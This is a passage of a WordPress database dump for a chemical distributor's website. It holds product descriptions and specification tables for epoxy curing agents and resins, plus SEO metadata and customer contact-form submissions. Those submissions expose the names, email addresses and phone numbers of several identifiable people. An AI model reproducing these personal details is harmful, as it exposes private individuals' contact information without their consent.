INSERT INTO `wp_postmeta` VALUES (26388, 3054, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26389, 3054, '_field_1', 'Ortal Lenchner'); 
INSERT INTO `wp_postmeta` VALUES (26390, 3054, '_field_10', 'TRANS PRO'); 
INSERT INTO `wp_postmeta` VALUES (26391, 3054, '_field_2', 'ortall@asis-pro.com'); 
INSERT INTO `wp_postmeta` VALUES (26392, 3054, '_field_8', '(052) 682-1110'); 
INSERT INTO `wp_postmeta` VALUES (26393, 3054, '_field_3', 'I would like to recieve please quote for 5pcs, PN MS-222N'); 
INSERT INTO `wp_postmeta` VALUES (26394, 3054, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26395, 3054, '_sub_id', '3054'); 
INSERT INTO `wp_postmeta` VALUES (26396, 1880, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (26397, 1187, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (26398, 1187, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (26399, 1187, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (26400, 1187, '_yoast_wpseo_focuskw_text_input', 'EPIKURE 3245'); 
INSERT INTO `wp_postmeta` VALUES (26401, 1187, '_yoast_wpseo_focuskw', 'EPIKURE 3245'); 
INSERT INTO `wp_postmeta` VALUES (26402, 1187, '_yoast_wpseo_metadesc', 'EPIKURE 3245 is a Hexion unmodified aliphatic amine curing agent used in a variety of applications including epoxy curing agent, with robust reactivity.'); 
INSERT INTO `wp_postmeta` VALUES (26403, 1187, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (26404, 1187, '_yoast_wpseo_focuskeywords', '[{"keyword":"Epoxy Curing Agent","score":"good"},{"keyword":"Aliphatic Amine","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (26405, 1187, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (26406, 1187, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (26407, 1187, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (26408, 1187, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (26409, 1187, '_ywtm_content_tab_description', 'EPIKURE 3245 Epoxy Curing Agent as well as 3200, 3223, and 3234, are unmodified aliphatic amines. They are used in a variety of applications including epoxy curing agents. Due to their tendency to form complexes with atmospheric carbon dioxide, particularly in humid conditions, they are most often formulated, adducted or otherwise reacted to inhibit amine blush. As members of the ethylene amine family, they lend themselves to a wide variety of chemical reactions and enduse applications.\r\n\r\n<strong>Application Areas/Suggested Uses</strong>\r\n<ul>\r\n 	<li>\r\n<div class="Section1">Epoxy curing agents</div></li>\r\n 	<li>\r\n<div class="Section1">Polyamides for inks and adhesives</div></li>\r\n 	<li>\r\n<div class="Section1">Wet strength resins</div></li>\r\n 	<li>\r\n<div class="Section1">Corrosion inhibitors</div></li>\r\n 	<li>\r\n<div class="Section1">Oil and fuel additives</div></li>\r\n 	<li>\r\n<div class="Section1">Chelating agents</div></li>\r\n</ul>\r\n<strong>Specification</strong>\r\n<table style="height: 190px;" border="1" width="854" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="176"></td>\r\n<td valign="top" width="63"></td>\r\n<td valign="top" width="75">\r\n<p align="center"><b>3200</b></p>\r\n<p align="center"><b>AEP</b></p>\r\n</td>\r\n<td valign="top" width="67">\r\n<p align="center"><b>3223</b></p>\r\n<p align="center"><b>DETA</b></p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center"><b>3234</b></p>\r\n<p align="center"><b>TETA</b></p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center"><b>3245</b></p>\r\n<p align="center"><b>TEPA</b></p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="176"><strong>Property</strong></td>\r\n<td valign="top" width="63">\r\n<p align="center"><strong>Units</strong></p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center"><strong>Value</strong></p>\r\n</td>\r\n<td valign="top" width="67">\r\n<p align="center"><strong>Value</strong></p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center"><strong>Value</strong></p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center"><strong>Value</strong></p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center"><strong>Test Method/Standard</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="176"><strong>Amine value</strong></td>\r\n<td valign="top" width="63">\r\n<p align="center">mg/g</p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center">1,275 – 1,325</p>\r\n</td>\r\n<td valign="top" width="67">\r\n<p align="center">1,580 – 1,850</p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center">1,410 – 1,460</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">1,290 – 1,375</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">ASTM D2896</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="176"><strong>Color</strong></td>\r\n<td valign="top" width="63">\r\n<p align="center">Pt-Co</p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center"><span class="GramE">200 max.</span></p>\r\n</td>\r\n<td valign="top" width="67">\r\n<p align="center"><span class="GramE">30 max.</span></p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center"><span class="GramE">50 max.</span></p>\r\n</td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="156">\r\n<p align="center">ASTM D1209</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="176"><strong>Color</strong></td>\r\n<td valign="top" width="63">\r\n<p align="center">Gardner</p>\r\n</td>\r\n<td valign="top" width="75"></td>\r\n<td valign="top" width="67"></td>\r\n<td valign="top" width="75"></td>\r\n<td valign="top" width="72">\r\n<p align="center"><span class="GramE">2 max.</span></p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">ASTM D1544</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="176"><strong>Water</strong></td>\r\n<td valign="top" width="63">\r\n<p align="center">% wt.</p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center"><span class="GramE">0.5 max.</span></p>\r\n</td>\r\n<td valign="top" width="67">\r\n<p align="center"><span class="GramE">0.5 max.</span></p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center"><span class="GramE">0.5 max.</span></p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center"><span class="GramE">0.5 max.</span></p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">ASTM E1064</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="176"><strong>Purity</strong></td>\r\n<td valign="top" width="63">\r\n<p align="center">% wt.</p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center">98.0</p>\r\n</td>\r\n<td valign="top" width="67">\r\n<p align="center">98.5</p>\r\n</td>\r\n<td valign="top" width="75">\r\n<p align="center">96.0</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">95.0</p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Typical Properties</strong>\r\n<table style="height: 342px;" border="1" width="858" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="180"></td>\r\n<td valign="top" width="60"></td>\r\n<td valign="top" width="72">\r\n<p align="center"><b>3200</b></p>\r\n<p align="center"><b>AEP</b></p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center"><b>3223</b></p>\r\n<p align="center"><b>DETA</b></p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center"><b>3234</b></p>\r\n<p align="center"><b>TETA</b></p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center"><b>3245</b></p>\r\n<p align="center"><b>TEPA</b></p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="180">Property</td>\r\n<td valign="top" width="60">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="180">Viscosity at 20°C</td>\r\n<td valign="top" width="60">\r\n<p align="center">cP</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">20</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">10</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">25</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">100</p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="180">Equivalent weight, approx.</td>\r\n<td valign="top" width="60"></td>\r\n<td valign="top" width="72">\r\n<p align="center">43</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">20.7</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">24.5</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">27.2</p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="180">Density @ 20 °C</td>\r\n<td valign="top" width="60">\r\n<p align="center">g/ml</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">0.98</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">0.95</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">0.98</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">0.99</p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="180">Boiling Point, 760 mm Hg</td>\r\n<td valign="top" width="60">\r\n<p align="center">°C</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">222</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">207</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">227</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">Decomp.</p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="180">Flash Point</td>\r\n<td valign="top" width="60">\r\n<p align="center">°C</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">215</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">210</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">275</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">280</p>\r\n</td>\r\n<td valign="top" width="156">\r\n<p align="center">ASTM D56</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="180">Mix Ratio, EEW 190 epoxy</td>\r\n<td valign="top" width="60">\r\n<p align="center">phr</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">22.7</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">10.9</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">12.9</p>\r\n</td>\r\n<td valign="top" width="72">\r\n<p align="center">14.3</p>\r\n</td>\r\n<td valign="top" width="156"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\nStorage:\r\n\r\nTo preserve Epikure 3245 product quality and prevent discoloration, it is recommended that a nitrogen blanket be maintained on the headspace of an opened container and that storage / handling temperatures in excess of 50°C (122°F) be avoided. Spillage around the opening of the container from dispensing operations will form a crystalline residue. This residue is not soluble in the curing agent <span class="GramE">nor</span> the resin, and certain measures should be taken to prevent it from contaminating the remaining contents of the container. The crystalline residue should be removed with a warm damp wash cloth PRIOR to re-opening the container for dispensing.\r\n\r\n&nbsp;\r\n\r\nMiller-Stephenson is an Epon, Epikure, Eponex, and Heloxy Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>'); 
INSERT INTO `wp_postmeta` VALUES (26410, 1187, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (26411, 1882, '_wp_attachment_image_alt', 'EPIKURE 3282 Curing Agent'); 
INSERT INTO `wp_postmeta` VALUES (26412, 1193, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (26413, 1193, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (26414, 1193, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (26415, 1193, '_yoast_wpseo_focuskw_text_input', 'Epikure Curing Agent'); 
INSERT INTO `wp_postmeta` VALUES (26416, 1193, '_yoast_wpseo_focuskw', 'EPIKURE 3282'); 
INSERT INTO `wp_postmeta` VALUES (26417, 1193, '_yoast_wpseo_metadesc', 'EPIKURE 3282, a very reactive modified aliphatic amine adduct developed for applications where relatively short cure periods at room temperature is needed.'); 
INSERT INTO `wp_postmeta` VALUES (26418, 1193, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (26419, 1193, '_yoast_wpseo_focuskeywords', '[{"keyword":"Curing Agent","score":"good"},{"keyword":"Epikure Curing Agent","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (26420, 3058, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26421, 3058, '_seq_num', '130'); 
INSERT INTO `wp_postmeta` VALUES (26422, 3058, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26423, 3058, '_field_12', 'Charley Robertson'); 
INSERT INTO `wp_postmeta` VALUES (26424, 3058, '_field_13', 'Score High Gunsmithing'); 
INSERT INTO `wp_postmeta` VALUES (26425, 3058, '_field_18', '2885160'); 
INSERT INTO `wp_postmeta` VALUES (26426, 3058, '_field_14', 'charley@scorehi.com'); 
INSERT INTO `wp_postmeta` VALUES (26427, 3058, '_field_15', '(800) 326-5632'); 
INSERT INTO `wp_postmeta` VALUES (26428, 3058, '_field_16', 'Please send SDS pdf docs for:\r\n3140\r\n3125\r\n3253\r\n8281'); 
INSERT INTO `wp_postmeta` VALUES (26429, 3058, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26430, 3058, '_sub_id', '3058'); 
INSERT INTO `wp_postmeta` VALUES (26431, 3059, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26432, 3059, '_seq_num', '131'); 
INSERT INTO `wp_postmeta` VALUES (26433, 3059, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26434, 3059, '_field_12', 'Thomas Boslem'); 
INSERT INTO `wp_postmeta` VALUES (26435, 3059, '_field_13', 'US NAVY'); 
INSERT INTO `wp_postmeta` VALUES (26436, 3059, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26437, 3059, '_field_14', 'thomas.boslem@navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (26438, 3059, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26439, 3059, '_field_16', 'I&#039;m looking for a SDS on product NSN 9150-01-443-9003'); 
INSERT INTO `wp_postmeta` VALUES (26440, 3059, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26441, 3059, '_sub_id', '3059'); 
INSERT INTO `wp_postmeta` VALUES (26443, 3061, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26444, 3061, '_seq_num', '132'); 
INSERT INTO `wp_postmeta` VALUES (26445, 3061, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26446, 3061, '_field_12', 'Timothy Holland'); 
INSERT INTO `wp_postmeta` VALUES (26447, 3061, '_field_13', 'Parker Medical, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (26448, 3061, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26449, 3061, '_field_14', 't.holland@parkermed.com'); 
INSERT INTO `wp_postmeta` VALUES (26450, 3061, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26451, 3061, '_field_16', 'Could you please supply the ROHS and REACH Statements for the EPON 8280?'); 
INSERT INTO `wp_postmeta` VALUES (26452, 3061, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26453, 3061, '_sub_id', '3061'); 
INSERT INTO `wp_postmeta` VALUES (26454, 3062, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26455, 3062, '_seq_num', '133'); 
INSERT INTO `wp_postmeta` VALUES (26456, 3062, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26457, 3062, '_field_12', 'Cory Rich'); 
INSERT INTO `wp_postmeta` VALUES (26458, 3062, '_field_13', 'Sanmina'); 
INSERT INTO `wp_postmeta` VALUES (26459, 3062, '_field_18', '177'); 
INSERT INTO `wp_postmeta` VALUES (26460, 3062, '_field_14', 'cory.rich@sanmina.com'); 
INSERT INTO `wp_postmeta` VALUES (26461, 3062, '_field_15', '8014012305'); 
INSERT INTO `wp_postmeta` VALUES (26462, 3062, '_field_16', 'Need a SDS for Quick-Freeze Anti-Static MS-242N-AS\r\n'); 
INSERT INTO `wp_postmeta` VALUES (26463, 3062, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26464, 3062, '_sub_id', '3062'); 
INSERT INTO `wp_postmeta` VALUES (26465, 3063, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26466, 3063, '_seq_num', '118'); 
INSERT INTO `wp_postmeta` VALUES (26467, 3063, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26468, 3063, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26469, 3063, '_field_1', 'Gabriela'); 
INSERT INTO `wp_postmeta` VALUES (26470, 3063, '_field_10', 'MED TECHNOLOGY'); 
INSERT INTO `wp_postmeta` VALUES (26471, 3063, '_field_2', 'gabriela.mironescu@medtechnology.it'); 
INSERT INTO `wp_postmeta` VALUES (26472, 3063, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (26473, 3063, '_field_3', 'Dear Sirs,\nMy name is Gabriela Mironescu and I’m in charge with MED TECHNOLOGY procurement department \nOur Company is located in Rome, Italy and we deal as distributors for the aerospace field; for more about us please visit our website www.medtechnology.it \nWe are looking for the following product\n\nPAINT MIL-I-46058 TY.UR*INSULATING POLYURETHANE RESIN (EMAP*LOCKHEED) PACKAGING 1 GAL\nQ-ty: 2 pcs\nQuality requirements:\n-	Mfg certificate of conformance stating production batch nr, DOM and DOE\n\nLooking forward to receiving your quotation\nYours sincerely,\n\nGabriela Mironescu\ngabriela.mironescu@medtechnology.it \nTel: +39 (0)698183524\n\n'); 
INSERT INTO `wp_postmeta` VALUES (26474, 3063, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26475, 3063, '_sub_id', '3063'); 
INSERT INTO `wp_postmeta` VALUES (26476, 3064, '_edit_lock', '1479479609:2'); 
INSERT INTO `wp_postmeta` VALUES (26477, 3064, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (26478, 3065, '_wp_attached_file', '2016/11/shutterstock_422528992.jpg'); 
INSERT INTO `wp_postmeta` VALUES (26479, 3065, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:727;s:4:"file";s:34:"2016/11/shutterstock_422528992.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_422528992-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_422528992-800x582.jpg";s:5:"width";i:800;s:6:"height";i:582;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_422528992-768x558.jpg";s:5:"width";i:768;s:6:"height";i:558;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_422528992-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_422528992-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_422528992-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_422528992-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:63;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (26480, 3064, '_thumbnail_id', '3065'); 
INSERT INTO `wp_postmeta` VALUES (26482, 3064, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (26483, 3064, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (26484, 3064, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (26485, 3064, '_yoast_wpseo_focuskw_text_input', 'FPG 182'); 
INSERT INTO `wp_postmeta` VALUES (26486, 3064, '_yoast_wpseo_focuskw', 'FPG 182'); 
INSERT INTO `wp_postmeta` VALUES (26487, 3064, '_yoast_wpseo_title', 'Introducing Krytox™ FPG 182 Performance Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (26488, 3064, '_yoast_wpseo_metadesc', 'Introducing Krytox™ FPG 182 Performance Lubricant for Clean Rooms, Robotics and Electronic Manufacturing. Miller-Stephenson is an authorized distributor.'); 
INSERT INTO `wp_postmeta` VALUES (26489, 3064, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (26490, 3064, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (26491, 3064, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (26496, 3064, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (26497, 3064, '_yoast_wpseo_linkdex', '74'); 
INSERT INTO `wp_postmeta` VALUES (26498, 3069, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26499, 3069, '_seq_num', '119'); 
INSERT INTO `wp_postmeta` VALUES (26500, 3069, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26501, 3069, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26502, 3069, '_field_1', 'Cheryl Christensen, Strategic Buyer'); 
INSERT INTO `wp_postmeta` VALUES (26503, 3069, '_field_10', 'Wittenstein NA'); 
INSERT INTO `wp_postmeta` VALUES (26504, 3069, '_field_2', 'cheryl.christensen@wittenstein-us.com'); 
INSERT INTO `wp_postmeta` VALUES (26505, 3069, '_field_8', '(630) 540-5332'); 
INSERT INTO `wp_postmeta` VALUES (26506, 3069, '_field_3', 'Hello,\nMy name is Cheryl Christensen, Strategic Buyer for Wittenstein NA, located in Bartlett, IL.  I am in the process of updating our supplier certification files.  At your earliest convenience, please provide me a list of your certifications (i.e. ISO 9001, ISO 14001, TS 16949, Minority, etc), along with a copy of each certification or a web link to the certification.  I appreciate your support for this request.  Thank you. \n'); 
INSERT INTO `wp_postmeta` VALUES (26507, 3069, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26508, 3069, '_sub_id', '3069'); 
INSERT INTO `wp_postmeta` VALUES (26509, 1894, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (26510, 882, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (26511, 882, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (26512, 882, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (26513, 882, '_yoast_wpseo_focuskw_text_input', 'Epon 830'); 
INSERT INTO `wp_postmeta` VALUES (26514, 882, '_yoast_wpseo_focuskw', 'Epon 830'); 
INSERT INTO `wp_postmeta` VALUES (26515, 882, '_yoast_wpseo_metadesc', 'EPON 830 is a slightly higher molecular weight BPA liquid epoxy as compared to EPON 828. Provides greater reactivity when combined with curing agents.'); 
INSERT INTO `wp_postmeta` VALUES (26516, 882, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (26517, 882, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (26518, 882, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (26519, 882, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (26520, 882, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (26521, 882, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (26522, 882, '_ywtm_content_tab_description', '<p class="Section1">EPON 830 is a slightly higher molecular weight BPA liquid epoxy as compared to EPON 828. The resin itself is resistant to crystallization and also in blends with HELOXY™Modifiers.   EPON Resin 830 is somewhat higher in viscosity than EPON Resin 828, although the viscosity is still easily handled. It provides greater reactivity when combined with most curing agents.</p>\r\n<p class="Section1"> <strong>Application Areas/Suggested Uses</strong></p>\r\n\r\n<div class="Section1">\r\n<ul>\r\n 	<li>Industrial floor toppings and grouting</li>\r\n 	<li>High build glaze, sealer or gel coats</li>\r\n 	<li>General purpose casting and encapsulation</li>\r\n 	<li>Base resin for dilution with Heloxy Modifiers</li>\r\n</ul>\r\n</div>\r\n<strong>Benefits</strong>\r\n<ul>\r\n 	<li>Slightly higher viscosity than standard liquid epoxy</li>\r\n 	<li>Very good resistance to crystallization</li>\r\n 	<li>Higher reactivity at room temperature</li>\r\n 	<li>Low color</li>\r\n 	<li>Good chemical resistance</li>\r\n</ul>\r\nSpecifications\r\n<table border="1" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Weight per Epoxide</td>\r\n<td valign="top" width="72">\r\n<p align="center">g/eq</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">190 – 198</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1652</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Viscosity at 25°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">P</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">170 – 225</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D445</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Color</td>\r\n<td valign="top" width="72">\r\n<p align="center">Gardner</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">1 max.</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1544</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211"></td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132"></td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<strong>Typical Properties</strong>\r\n<table border="1" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Density at 25°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">lb/gal</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">9.7</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1475</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nEPON 830 liquid epoxy resins when properly formulated and cured provide an inert end-product with a unique combination of properties. They are suitable for use in high performance applications such as coatings, adhesives, civil engineering, electronic and electrical insulation, composites and fiber sizing. Cured EPON resins are generally regarded as being high strength materials, since many commonly used systems provide tensile strengths greater than 10,000 psi and modulus values greater than 400,000 psi. One of the most widely recognized applications of cured EPON Resin 830 is strong adhesion to a broad range of substrates. Such systems exhibit shear strength of up to 6,000 psi (41 Mpa). One factor which contributes to this property is the low shrinkage shown by these systems during cure. Please refer to the MSDS for the most current 